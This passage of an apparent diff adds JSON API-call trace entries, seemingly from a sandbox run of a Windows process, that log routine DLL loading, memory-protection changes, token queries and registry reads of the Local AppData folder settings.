+ "return": "0x00000000", + "arguments": [ + { + "name": "ModuleName", + "value": "KERNELBASE.dll" + }, + { + "name": "ModuleHandle", + "value": "0x755a0000" + }, + { + "name": "FunctionName", + "value": "EventSetInformation" + }, + { + "name": "Ordinal", + "value": "0" + }, + { + "name": "FunctionAddress", + "value": "0x77020b30" + } + ], + "repeated": 0, + "id": 318 + }, + { + "timestamp": "2025-03-07 21:41:19,140", + "thread_id": "9452", + "caller": "0x02431642", + "parentcaller": "0x00000000", + "category": "system", + "api": "LdrpCallInitRoutine", + "status": true, + "return": "0x00000001", + "arguments": [ + { + "name": "MappedPath", + "value": "\\Device\\HarddiskVolume2\\Windows\\SysWOW64\\wldp" + }, + { + "name": "BaseAddress", + "value": "0x74850000" + }, + { + "name": "InitRoutine", + "value": "0x74858970" + }, + { + "name": "Reason", + "value": "1" + } + ], + "repeated": 0, + "id": 319 + }, + { + "timestamp": "2025-03-07 21:41:19,140", + "thread_id": "9452", + "caller": "0x02431642", + "parentcaller": "0x00000000", + "category": "system", + "api": "LdrGetDllHandle", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "FileName", + "value": "api-ms-win-core-synch-l1-2-0.dll" + }, + { + "name": "ModuleHandle", + "value": "0x755a0000" + } + ], + "repeated": 0, + "id": 320 + }, + { + "timestamp": "2025-03-07 21:41:19,140", + "thread_id": "9452", + "caller": "0x02431642", + "parentcaller": "0x00000000", + "category": "system", + "api": "LdrGetProcedureAddressForCaller", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "ModuleName", + "value": "KERNELBASE.dll" + }, + { + "name": "ModuleHandle", + "value": "0x755a0000" + }, + { + "name": "FunctionName", + "value": "InitializeConditionVariable" + }, + { + "name": "Ordinal", + "value": "0" + }, + { + "name": "FunctionAddress", + "value": "0x77054e00" + } + ], + "repeated": 0, + "id": 321 + }, + { + "timestamp": "2025-03-07 21:41:19,140", + "thread_id": "9452", + "caller": "0x02431642", + "parentcaller": "0x00000000", + "category": "system", + "api": "LdrGetProcedureAddressForCaller", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "ModuleName", + "value": "KERNELBASE.dll" + }, + { + "name": "ModuleHandle", + "value": "0x755a0000" + }, + { + "name": "FunctionName", + "value": "SleepConditionVariableCS" + }, + { + "name": "Ordinal", + "value": "0" + }, + { + "name": "FunctionAddress", + "value": "0x75777090" + } + ], + "repeated": 0, + "id": 322 + }, + { + "timestamp": "2025-03-07 21:41:19,140", + "thread_id": "9452", + "caller": "0x02431642", + "parentcaller": "0x00000000", + "category": "system", + "api": "LdrGetProcedureAddressForCaller", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "ModuleName", + "value": "KERNELBASE.dll" + }, + { + "name": "ModuleHandle", + "value": "0x755a0000" + }, + { + "name": "FunctionName", + "value": "WakeAllConditionVariable" + }, + { + "name": "Ordinal", + "value": "0" + }, + { + "name": "FunctionAddress", + "value": "0x7705a560" + } + ], + "repeated": 0, + "id": 323 + }, + { + "timestamp": "2025-03-07 21:41:19,140", + "thread_id": "9452", + "caller": "0x02431642", + "parentcaller": "0x00000000", + "category": "process", + "api": "NtProtectVirtualMemory", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "ProcessHandle", + "value": "0xffffffff" + }, + { + "name": "BaseAddress", + "value": "0x74e25000" + }, + { + "name": "ModuleName", + "value": "windows.storage.dll" + }, + { + "name": "NumberOfBytesProtected", + "value": "0x00001000" + }, + { + "name": "MemoryType", + "value": "0x00000000" + }, + { + "name": "NewAccessProtection", + "value": "0x00000004", + "pretty_value": "PAGE_READWRITE" + }, + { + "name": "OldAccessProtection", + "value": "0x00000002", + "pretty_value": "PAGE_READONLY" + }, + { + "name": "StackPivoted", + "value": "no" + } + ], + "repeated": 0, + "id": 324 + }, + { + "timestamp": "2025-03-07 21:41:19,140", + "thread_id": "9452", + "caller": "0x02431642", + "parentcaller": "0x00000000", + "category": "process", + "api": "NtProtectVirtualMemory", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "ProcessHandle", + "value": "0xffffffff" + }, + { + "name": "BaseAddress", + "value": "0x74e25000" + }, + { + "name": "ModuleName", + "value": "windows.storage.dll" + }, + { + "name": "NumberOfBytesProtected", + "value": "0x00001000" + }, + { + "name": "MemoryType", + "value": "0x00000000" + }, + { + "name": "NewAccessProtection", + "value": "0x00000002", + "pretty_value": "PAGE_READONLY" + }, + { + "name": "OldAccessProtection", + "value": "0x00000004", + "pretty_value": "PAGE_READWRITE" + }, + { + "name": "StackPivoted", + "value": "no" + } + ], + "repeated": 0, + "id": 325 + }, + { + "timestamp": "2025-03-07 21:41:19,140", + "thread_id": "9452", + "caller": "0x02431642", + "parentcaller": "0x00000000", + "category": "system", + "api": "LdrGetDllHandle", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "FileName", + "value": "ntdll.dll" + }, + { + "name": "ModuleHandle", + "value": "0x76ff0000" + } + ], + "repeated": 0, + "id": 326 + }, + { + "timestamp": "2025-03-07 21:41:19,140", + "thread_id": "9452", + "caller": "0x02431642", + "parentcaller": "0x00000000", + "category": "system", + "api": "LdrGetProcedureAddressForCaller", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "ModuleName", + "value": "ntdll.dll" + }, + { + "name": "ModuleHandle", + "value": "0x76ff0000" + }, + { + "name": "FunctionName", + "value": "RtlDllShutdownInProgress" + }, + { + "name": "Ordinal", + "value": "0" + }, + { + "name": "FunctionAddress", + "value": "0x7704f590" + } + ], + "repeated": 0, + "id": 327 + }, + { + "timestamp": "2025-03-07 21:41:19,140", + "thread_id": "9452", + "caller": "0x02431642", + "parentcaller": "0x00000000", + "category": "system", + "api": "LdrpCallInitRoutine", + "status": true, + "return": "0x00000001", + "arguments": [ + { + "name": "MappedPath", + "value": "\\Device\\HarddiskVolume2\\Windows\\SysWOW64\\windows.storage" + }, + { + "name": "BaseAddress", + "value": "0x74880000" + }, + { + "name": "InitRoutine", + "value": "0x74a5a360" + }, + { + "name": "Reason", + "value": "1" + } + ], + "repeated": 0, + "id": 328 + }, + { + "timestamp": "2025-03-07 21:41:19,140", + "thread_id": "9452", + "caller": "0x02431642", + "parentcaller": "0x00000000", + "category": "process", + "api": "NtProtectVirtualMemory", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "ProcessHandle", + "value": "0xffffffff" + }, + { + "name": "BaseAddress", + "value": "0x75ea6000" + }, + { + "name": "ModuleName", + "value": "SHELL32.dll" + }, + { + "name": "NumberOfBytesProtected", + "value": "0x00001000" + }, + { + "name": "MemoryType", + "value": "0x00000000" + }, + { + "name": "NewAccessProtection", + "value": "0x00000004", + "pretty_value": "PAGE_READWRITE" + }, + { + "name": "OldAccessProtection", + "value": "0x00000002", + "pretty_value": "PAGE_READONLY" + }, + { + "name": "StackPivoted", + "value": "no" + } + ], + "repeated": 0, + "id": 329 + }, + { + "timestamp": "2025-03-07 21:41:19,140", + "thread_id": "9452", + "caller": "0x02431642", + "parentcaller": "0x00000000", + "category": "process", + "api": "NtProtectVirtualMemory", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "ProcessHandle", + "value": "0xffffffff" + }, + { + "name": "BaseAddress", + "value": "0x75ea6000" + }, + { + "name": "ModuleName", + "value": "SHELL32.dll" + }, + { + "name": "NumberOfBytesProtected", + "value": "0x00001000" + }, + { + "name": "MemoryType", + "value": "0x00000000" + }, + { + "name": "NewAccessProtection", + "value": "0x00000002", + "pretty_value": "PAGE_READONLY" + }, + { + "name": "OldAccessProtection", + "value": "0x00000004", + "pretty_value": "PAGE_READWRITE" + }, + { + "name": "StackPivoted", + "value": "no" + } + ], + "repeated": 0, + "id": 330 + }, + { + "timestamp": "2025-03-07 21:41:19,140", + "thread_id": "9452", + "caller": "0x0243151f", + "parentcaller": "0x02431642", + "category": "process", + "api": "NtProtectVirtualMemory", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "ProcessHandle", + "value": "0xffffffff" + }, + { + "name": "BaseAddress", + "value": "0x74e25000" + }, + { + "name": "ModuleName", + "value": "windows.storage.dll" + }, + { + "name": "NumberOfBytesProtected", + "value": "0x00001000" + }, + { + "name": "MemoryType", + "value": "0x00000000" + }, + { + "name": "NewAccessProtection", + "value": "0x00000004", + "pretty_value": "PAGE_READWRITE" + }, + { + "name": "OldAccessProtection", + "value": "0x00000002", + "pretty_value": "PAGE_READONLY" + }, + { + "name": "StackPivoted", + "value": "no" + } + ], + "repeated": 0, + "id": 331 + }, + { + "timestamp": "2025-03-07 21:41:19,140", + "thread_id": "9452", + "caller": "0x0243151f", + "parentcaller": "0x02431642", + "category": "process", + "api": "NtProtectVirtualMemory", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "ProcessHandle", + "value": "0xffffffff" + }, + { + "name": "BaseAddress", + "value": "0x74e25000" + }, + { + "name": "ModuleName", + "value": "windows.storage.dll" + }, + { + "name": "NumberOfBytesProtected", + "value": "0x00001000" + }, + { + "name": "MemoryType", + "value": "0x00000000" + }, + { + "name": "NewAccessProtection", + "value": "0x00000002", + "pretty_value": "PAGE_READONLY" + }, + { + "name": "OldAccessProtection", + "value": "0x00000004", + "pretty_value": "PAGE_READWRITE" + }, + { + "name": "StackPivoted", + "value": "no" + } + ], + "repeated": 0, + "id": 332 + }, + { + "timestamp": "2025-03-07 21:41:19,140", + "thread_id": "9452", + "caller": "0x0243151f", + "parentcaller": "0x02431642", + "category": "process", + "api": "NtOpenSection", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "SectionHandle", + "value": "0x00000304" + }, + { + "name": "DesiredAccess", + "value": "0x00000006" + }, + { + "name": "ObjectAttributes", + "value": "windows_shell_global_counters" + } + ], + "repeated": 0, + "id": 333 + }, + { + "timestamp": "2025-03-07 21:41:19,140", + "thread_id": "9452", + "caller": "0x0243151f", + "parentcaller": "0x02431642", + "category": "process", + "api": "NtMapViewOfSection", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "SectionHandle", + "value": "0x00000304" + }, + { + "name": "ProcessHandle", + "value": "0xffffffff" + }, + { + "name": "BaseAddress", + "value": "0x03c60000" + }, + { + "name": "SectionOffset", + "value": "0x0019f72c" + }, + { + "name": "ViewSize", + "value": "0x00001000" + }, + { + "name": "Win32Protect", + "value": "0x00000004", + "pretty_value": "PAGE_READWRITE" + }, + { + "name": "StackPivoted", + "value": "no" + } + ], + "repeated": 0, + "id": 334 + }, + { + "timestamp": "2025-03-07 21:41:19,140", + "thread_id": "9452", + "caller": "0x0243151f", + "parentcaller": "0x02431642", + "category": "process", + "api": "NtOpenProcessToken", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "ProcessHandle", + "value": "0xffffffff" + }, + { + "name": "DesiredAccess", + "value": "0x00000008" + }, + { + "name": "TokenHandle", + "value": "0x00000308" + } + ], + "repeated": 0, + "id": 335 + }, + { + "timestamp": "2025-03-07 21:41:19,140", + "thread_id": "9452", + "caller": "0x0243151f", + "parentcaller": "0x02431642", + "category": "process", + "api": "NtQueryInformationToken", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "TokenInformationClass", + "value": "29" + }, + { + "name": "TokenInformation", + "value": "\\x00\\x00\\x00\\x00" + } + ], + "repeated": 0, + "id": 336 + }, + { + "timestamp": "2025-03-07 21:41:19,140", + "thread_id": "9452", + "caller": "0x0243151f", + "parentcaller": "0x02431642", + "category": "process", + "api": "NtProtectVirtualMemory", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "ProcessHandle", + "value": "0xffffffff" + }, + { + "name": "BaseAddress", + "value": "0x74e25000" + }, + { + "name": "ModuleName", + "value": "windows.storage.dll" + }, + { + "name": "NumberOfBytesProtected", + "value": "0x00001000" + }, + { + "name": "MemoryType", + "value": "0x00000000" + }, + { + "name": "NewAccessProtection", + "value": "0x00000004", + "pretty_value": "PAGE_READWRITE" + }, + { + "name": "OldAccessProtection", + "value": "0x00000002", + "pretty_value": "PAGE_READONLY" + }, + { + "name": "StackPivoted", + "value": "no" + } + ], + "repeated": 0, + "id": 337 + }, + { + "timestamp": "2025-03-07 21:41:19,140", + "thread_id": "9452", + "caller": "0x0243151f", + "parentcaller": "0x02431642", + "category": "process", + "api": "NtProtectVirtualMemory", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "ProcessHandle", + "value": "0xffffffff" + }, + { + "name": "BaseAddress", + "value": "0x74e25000" + }, + { + "name": "ModuleName", + "value": "windows.storage.dll" + }, + { + "name": "NumberOfBytesProtected", + "value": "0x00001000" + }, + { + "name": "MemoryType", + "value": "0x00000000" + }, + { + "name": "NewAccessProtection", + "value": "0x00000002", + "pretty_value": "PAGE_READONLY" + }, + { + "name": "OldAccessProtection", + "value": "0x00000004", + "pretty_value": "PAGE_READWRITE" + }, + { + "name": "StackPivoted", + "value": "no" + } + ], + "repeated": 0, + "id": 338 + }, + { + "timestamp": "2025-03-07 21:41:19,140", + "thread_id": "9452", + "caller": "0x0243151f", + "parentcaller": "0x02431642", + "category": "process", + "api": "NtQueryInformationToken", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "TokenInformationClass", + "value": "25" + }, + { + "name": "TokenInformation", + "value": "\\x00\\xf7\\x19\\x00`\\x00\\x00\\x00\\x01\\x01\\x00\\x00\\x00\\x00\\x00\\x10\\x000\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00" + } + ], + "repeated": 0, + "id": 339 + }, + { + "timestamp": "2025-03-07 21:41:19,140", + "thread_id": "9452", + "caller": "0x0243151f", + "parentcaller": "0x02431642", + "category": "misc", + "api": "RtlSetCurrentTransaction", + "status": true, + "return": "0x00000001", + "arguments": [ + { + "name": "TransactionHandle", + "value": "0x00000000" + } + ], + "repeated": 1, + "id": 340 + }, + { + "timestamp": "2025-03-07 21:41:19,140", + "thread_id": "9452", + "caller": "0x0243151f", + "parentcaller": "0x02431642", + "category": "registry", + "api": "NtOpenKeyEx", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "KeyHandle", + "value": "0x0000030c" + }, + { + "name": "DesiredAccess", + "value": "0x00020019", + "pretty_value": "KEY_READ" + }, + { + "name": "ObjectAttributesHandle", + "value": "0x0000011c" + }, + { + "name": "ObjectAttributesName", + "value": "Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\FolderDescriptions" + }, + { + "name": "ObjectAttributes", + "value": "HKEY_LOCAL_MACHINE\\Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\FolderDescriptions" + } + ], + "repeated": 0, + "id": 341 + }, + { + "timestamp": "2025-03-07 21:41:19,140", + "thread_id": "9452", + "caller": "0x0243151f", + "parentcaller": "0x02431642", + "category": "process", + "api": "NtProtectVirtualMemory", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "ProcessHandle", + "value": "0xffffffff" + }, + { + "name": "BaseAddress", + "value": "0x74e25000" + }, + { + "name": "ModuleName", + "value": "windows.storage.dll" + }, + { + "name": "NumberOfBytesProtected", + "value": "0x00001000" + }, + { + "name": "MemoryType", + "value": "0x00000000" + }, + { + "name": "NewAccessProtection", + "value": "0x00000004", + "pretty_value": "PAGE_READWRITE" + }, + { + "name": "OldAccessProtection", + "value": "0x00000002", + "pretty_value": "PAGE_READONLY" + }, + { + "name": "StackPivoted", + "value": "no" + } + ], + "repeated": 0, + "id": 342 + }, + { + "timestamp": "2025-03-07 21:41:19,140", + "thread_id": "9452", + "caller": "0x0243151f", + "parentcaller": "0x02431642", + "category": "process", + "api": "NtProtectVirtualMemory", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "ProcessHandle", + "value": "0xffffffff" + }, + { + "name": "BaseAddress", + "value": "0x74e25000" + }, + { + "name": "ModuleName", + "value": "windows.storage.dll" + }, + { + "name": "NumberOfBytesProtected", + "value": "0x00001000" + }, + { + "name": "MemoryType", + "value": "0x00000000" + }, + { + "name": "NewAccessProtection", + "value": "0x00000002", + "pretty_value": "PAGE_READONLY" + }, + { + "name": "OldAccessProtection", + "value": "0x00000004", + "pretty_value": "PAGE_READWRITE" + }, + { + "name": "StackPivoted", + "value": "no" + } + ], + "repeated": 0, + "id": 343 + }, + { + "timestamp": "2025-03-07 21:41:19,140", + "thread_id": "9452", + "caller": "0x0243151f", + "parentcaller": "0x02431642", + "category": "registry", + "api": "NtOpenKeyEx", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "KeyHandle", + "value": "0x00000310" + }, + { + "name": "DesiredAccess", + "value": "0x00020019", + "pretty_value": "KEY_READ" + }, + { + "name": "ObjectAttributesHandle", + "value": "0x0000030c" + }, + { + "name": "ObjectAttributesName", + "value": "{F1B32785-6FBA-4FCF-9D55-7B8E7F157091}" + }, + { + "name": "ObjectAttributes", + "value": "HKEY_LOCAL_MACHINE\\SOFTWARE\\WOW6432Node\\Microsoft\\Windows\\CurrentVersion\\Explorer\\FolderDescriptions\\{F1B32785-6FBA-4FCF-9D55-7B8E7F157091}" + } + ], + "repeated": 0, + "id": 344 + }, + { + "timestamp": "2025-03-07 21:41:19,140", + "thread_id": "9452", + "caller": "0x0243151f", + "parentcaller": "0x02431642", + "category": "system", + "api": "NtClose", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "Handle", + "value": "0x0000030c" + } + ], + "repeated": 0, + "id": 345 + }, + { + "timestamp": "2025-03-07 21:41:19,140", + "thread_id": "9452", + "caller": "0x0243151f", + "parentcaller": "0x02431642", + "category": "registry", + "api": "NtQueryValueKey", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "KeyHandle", + "value": "0x00000310" + }, + { + "name": "ValueName", + "value": "Category" + }, + { + "name": "Type", + "value": "4", + "pretty_value": "REG_DWORD" + }, + { + "name": "Information", + "value": "4" + }, + { + "name": "FullName", + "value": "HKEY_LOCAL_MACHINE\\SOFTWARE\\WOW6432Node\\Microsoft\\Windows\\CurrentVersion\\Explorer\\FolderDescriptions\\{F1B32785-6FBA-4FCF-9D55-7B8E7F157091}\\Category" + } + ], + "repeated": 0, + "id": 346 + }, + { + "timestamp": "2025-03-07 21:41:19,140", + "thread_id": "9452", + "caller": "0x0243151f", + "parentcaller": "0x02431642", + "category": "registry", + "api": "NtQueryValueKey", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "KeyHandle", + "value": "0x00000310" + }, + { + "name": "ValueName", + "value": "Name" + }, + { + "name": "Type", + "value": "1", + "pretty_value": "REG_SZ" + }, + { + "name": "Information", + "value": "Local AppData" + }, + { + "name": "FullName", + "value": "HKEY_LOCAL_MACHINE\\SOFTWARE\\WOW6432Node\\Microsoft\\Windows\\CurrentVersion\\Explorer\\FolderDescriptions\\{F1B32785-6FBA-4FCF-9D55-7B8E7F157091}\\Name" + } + ], + "repeated": 0, + "id": 347 + }, + { + "timestamp": "2025-03-07 21:41:19,140", + "thread_id": "9452", + "caller": "0x0243151f", + "parentcaller": "0x02431642", + "category": "registry", + "api": "NtQueryValueKey", + "status": false, + "return": "0xffffffffc0000034", + "pretty_return": "OBJECT_NAME_NOT_FOUND", + "arguments": [ + { + "name": "KeyHandle", + "value": "0x00000310" + }, + { + "name": "ValueName", + "value": "ParentFolder" + }, + { + "name": "FullName", + "value": "HKEY_LOCAL_MACHINE\\SOFTWARE\\WOW6432Node\\Microsoft\\Windows\\CurrentVersion\\Explorer\\FolderDescriptions\\{F1B32785-6FBA-4FCF-9D55-7B8E7F157091}\\ParentFolder" + } + ], + "repeated": 0, + "id": 348 + }, + { + "timestamp": "2025-03-07 21:41:19,140", + "thread_id": "9452", + "caller": "0x0243151f", + "parentcaller": "0x02431642", + "category": "registry", + "api": "NtQueryValueKey", + "status": false, + "return": "0xffffffffc0000034", + "pretty_return": "OBJECT_NAME_NOT_FOUND", + "arguments": [ + { + "name": "KeyHandle", + "value": "0x00000310" + }, + { + "name": "ValueName", + "value": "Description" + }, + { + "name": "FullName", + "value": "HKEY_LOCAL_MACHINE\\SOFTWARE\\WOW6432Node\\Microsoft\\Windows\\CurrentVersion\\Explorer\\FolderDescriptions\\{F1B32785-6FBA-4FCF-9D55-7B8E7F157091}\\Description" + } + ], + "repeated": 0, + "id": 349 + }, + { + "timestamp": "2025-03-07 21:41:19,140", + "thread_id": "9452", + "caller": "0x0243151f", + "parentcaller": "0x02431642", + "category": "registry", + "api": "NtQueryValueKey", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "KeyHandle", + "value": "0x00000310" + }, + { + "name": "ValueName", + "value": "RelativePath" + }, + { + "name": "Type", + "value": "1", + "pretty_value": "REG_SZ" + }, + { + "name": "Information", + "value": "AppData\\Local" + }, + { + "name": "FullName", + "value": "HKEY_LOCAL_MACHINE\\SOFTWARE\\WOW6432Node\\Microsoft\\Windows\\CurrentVersion\\Explorer\\FolderDescriptions\\{F1B32785-6FBA-4FCF-9D55-7B8E7F157091}\\RelativePath" + } + ], + "repeated": 0, + "id": 350 + }, + { + "timestamp": "2025-03-07 21:41:19,140", + "thread_id": "9452", + "caller": "0x0243151f", + "parentcaller": "0x02431642", + "category": "registry", + "api": "NtQueryValueKey", + "status": false, + "return": "0xffffffffc0000034", + "pretty_return": "OBJECT_NAME_NOT_FOUND", + "arguments": [ + { + "name": "KeyHandle", + "value": "0x00000310" + }, + { + "name": "ValueName", + "value": "ParsingName" + }, + { + "name": "FullName", + "value": "HKEY_LOCAL_MACHINE\\SOFTWARE\\WOW6432Node\\Microsoft\\Windows\\CurrentVersion\\Explorer\\FolderDescriptions\\{F1B32785-6FBA-4FCF-9D55-7B8E7F157091}\\ParsingName" + } + ], + "repeated": 0, + "id": 351 + }, + { + "timestamp": "2025-03-07 21:41:19,140", + "thread_id": "9452", + "caller": "0x0243151f", + "parentcaller": "0x02431642", + "category": "registry", + "api": "NtQueryValueKey", + "status": false, + "return": "0xffffffffc0000034", + "pretty_return": "OBJECT_NAME_NOT_FOUND", + "arguments": [ + { + "name": "KeyHandle", + "value": "0x00000310" + }, + { + "name": "ValueName", + "value": "InfoTip" + }, + { + "name": "FullName", + "value": "HKEY_LOCAL_MACHINE\\SOFTWARE\\WOW6432Node\\Microsoft\\Windows\\CurrentVersion\\Explorer\\FolderDescriptions\\{F1B32785-6FBA-4FCF-9D55-7B8E7F157091}\\InfoTip" + } + ], + "repeated": 0, + "id": 352 + }, + { + "timestamp": "2025-03-07 21:41:19,140", + "thread_id": "9452", + "caller": "0x0243151f", + "parentcaller": "0x02431642", + "category": "registry", + "api": "NtQueryValueKey", + "status": false, + "return": "0xffffffffc0000034", + "pretty_return": "OBJECT_NAME_NOT_FOUND", + "arguments": [ + { + "name": "KeyHandle", + "value": "0x00000310" + }, + { + "name": "ValueName", + "value": "LocalizedName" + }, + { + "name": "FullName", + "value": "HKEY_LOCAL_MACHINE\\SOFTWARE\\WOW6432Node\\Microsoft\\Windows\\CurrentVersion\\Explorer\\FolderDescriptions\\{F1B32785-6FBA-4FCF-9D55-7B8E7F157091}\\LocalizedName" + } + ], + "repeated": 0, + "id": 353 + }, + { + "timestamp": "2025-03-07 21:41:19,140", + "thread_id": "9452", + "caller": "0x0243151f", + "parentcaller": "0x02431642", + "category": "registry", + "api": "NtQueryValueKey", + "status": false, + "return": "0xffffffffc0000034", + "pretty_return": "OBJECT_NAME_NOT_FOUND", + "arguments": [ + { + "name": "KeyHandle", + "value": "0x00000310" + }, + { + "name": "ValueName", + "value": "Icon" + }, + { + "name": "FullName", + "value": "HKEY_LOCAL_MACHINE\\SOFTWARE\\WOW6432Node\\Microsoft\\Windows\\CurrentVersion\\Explorer\\FolderDescriptions\\{F1B32785-6FBA-4FCF-9D55-7B8E7F157091}\\Icon" + } + ], + "repeated": 0, + "id": 354 + }, + { + "timestamp": "2025-03-07 21:41:19,140", + "thread_id": "9452", + "caller": "0x0243151f", + "parentcaller": "0x02431642", + "category": "registry", + "api": "NtQueryValueKey", + "status": false, + "return": "0xffffffffc0000034", + "pretty_return": "OBJECT_NAME_NOT_FOUND", + "arguments": [ + { + "name": "KeyHandle", + "value": "0x00000310" + }, + { + "name": "ValueName", + "value": "Security" + }, + { + "name": "FullName", + "value": "HKEY_LOCAL_MACHINE\\SOFTWARE\\WOW6432Node\\Microsoft\\Windows\\CurrentVersion\\Explorer\\FolderDescriptions\\{F1B32785-6FBA-4FCF-9D55-7B8E7F157091}\\Security" + } + ], + "repeated": 0, + "id": 355 + }, + { + "timestamp": "2025-03-07 21:41:19,140", + "thread_id": "9452", + "caller": "0x0243151f", + "parentcaller": "0x02431642", + "category": "registry", + "api": "NtQueryValueKey", + "status": false, + "return": "0xffffffffc0000034", + "pretty_return": "OBJECT_NAME_NOT_FOUND", + "arguments": [ + { + "name": "KeyHandle", + "value": "0x00000310" + }, + { + "name": "ValueName", + "value": "StreamResource" + }, + { + "name": "FullName", + "value": "HKEY_LOCAL_MACHINE\\SOFTWARE\\WOW6432Node\\Microsoft\\Windows\\CurrentVersion\\Explorer\\FolderDescriptions\\{F1B32785-6FBA-4FCF-9D55-7B8E7F157091}\\StreamResource" + } + ], + "repeated": 0, + "id": 356 + }, + { + "timestamp": "2025-03-07 21:41:19,140", + "thread_id": "9452", + "caller": "0x0243151f", + "parentcaller": "0x02431642", + "category": "registry", + "api": "NtQueryValueKey", + "status": false, + "return": "0xffffffffc0000034", + "pretty_return": "OBJECT_NAME_NOT_FOUND", + "arguments": [ + { + "name": "KeyHandle", + "value": "0x00000310" + }, + { + "name": "ValueName", + "value": "StreamResourceType" + }, + { + "name": "FullName", + "value": "HKEY_LOCAL_MACHINE\\SOFTWARE\\WOW6432Node\\Microsoft\\Windows\\CurrentVersion\\Explorer\\FolderDescriptions\\{F1B32785-6FBA-4FCF-9D55-7B8E7F157091}\\StreamResourceType" + } + ], + "repeated": 0, + "id": 357 + }, + { + "timestamp": "2025-03-07 21:41:19,140", + "thread_id": "9452", + "caller": "0x0243151f", + "parentcaller": "0x02431642", + "category": "registry", + "api": "NtQueryValueKey", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "KeyHandle", + "value": "0x00000310" + }, + { + "name": "ValueName", + "value": "LocalRedirectOnly" + }, + { + "name": "Type", + "value": "4", + "pretty_value": "REG_DWORD" + }, + { + "name": "Information", + "value": "1" + }, + { + "name": "FullName", + "value": "HKEY_LOCAL_MACHINE\\SOFTWARE\\WOW6432Node\\Microsoft\\Windows\\CurrentVersion\\Explorer\\FolderDescriptions\\{F1B32785-6FBA-4FCF-9D55-7B8E7F157091}\\LocalRedirectOnly" + } + ], + "repeated": 0, + "id": 358 + }, + { + "timestamp": "2025-03-07 21:41:19,140", + "thread_id": "9452", + "caller": "0x0243151f", + "parentcaller": "0x02431642", + "category": "registry", + "api": "NtQueryValueKey", + "status": false, + "return": "0xffffffffc0000034", + "pretty_return": "OBJECT_NAME_NOT_FOUND", + "arguments": [ + { + "name": "KeyHandle", + "value": "0x00000310" + }, + { + "name": "ValueName", + "value": "Roamable" + }, + { + "name": "FullName", + "value": "HKEY_LOCAL_MACHINE\\SOFTWARE\\WOW6432Node\\Microsoft\\Windows\\CurrentVersion\\Explorer\\FolderDescriptions\\{F1B32785-6FBA-4FCF-9D55-7B8E7F157091}\\Roamable" + } + ], + "repeated": 0, + "id": 359 + }, + { + "timestamp": "2025-03-07 21:41:19,140", + "thread_id": "9452", + "caller": "0x0243151f", + "parentcaller": "0x02431642", + "category": "registry", + "api": "NtQueryValueKey", + "status": false, + "return": "0xffffffffc0000034", + "pretty_return": "OBJECT_NAME_NOT_FOUND", + "arguments": [ + { + "name": "KeyHandle", + "value": "0x00000310" + }, + { + "name": "ValueName", + "value": "PreCreate" + }, + { + "name": "FullName", + "value": "HKEY_LOCAL_MACHINE\\SOFTWARE\\WOW6432Node\\Microsoft\\Windows\\CurrentVersion\\Explorer\\FolderDescriptions\\{F1B32785-6FBA-4FCF-9D55-7B8E7F157091}\\PreCreate" + } + ], + "repeated": 0, + "id": 360 + }, + { + "timestamp": "2025-03-07 21:41:19,140", + "thread_id": "9452", + "caller": "0x0243151f", + "parentcaller": "0x02431642", + "category": "registry", + "api": "NtQueryValueKey", + "status": false, + "return": "0xffffffffc0000034", + "pretty_return": "OBJECT_NAME_NOT_FOUND", + "arguments": [ + { + "name": "KeyHandle", + "value": "0x00000310" + }, + { + "name": "ValueName", + "value": "Stream" + }, + { + "name": "FullName", + "value": "HKEY_LOCAL_MACHINE\\SOFTWARE\\WOW6432Node\\Microsoft\\Windows\\CurrentVersion\\Explorer\\FolderDescriptions\\{F1B32785-6FBA-4FCF-9D55-7B8E7F157091}\\Stream" + } + ], + "repeated": 0, + "id": 361 + }, + { + "timestamp": "2025-03-07 21:41:19,140", + "thread_id": "9452", + "caller": "0x0243151f", + "parentcaller": "0x02431642", + "category": "registry", + "api": "NtQueryValueKey", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "KeyHandle", + "value": "0x00000310" + }, + { + "name": "ValueName", + "value": "PublishExpandedPath" + }, + { + "name": "Type", + "value": "4", + "pretty_value": "REG_DWORD" + }, + { + "name": "Information", + "value": "1" + }, + { + "name": "FullName", + "value": "HKEY_LOCAL_MACHINE\\SOFTWARE\\WOW6432Node\\Microsoft\\Windows\\CurrentVersion\\Explorer\\FolderDescriptions\\{F1B32785-6FBA-4FCF-9D55-7B8E7F157091}\\PublishExpandedPath" + } + ], + "repeated": 0, + "id": 362 + }, + { + 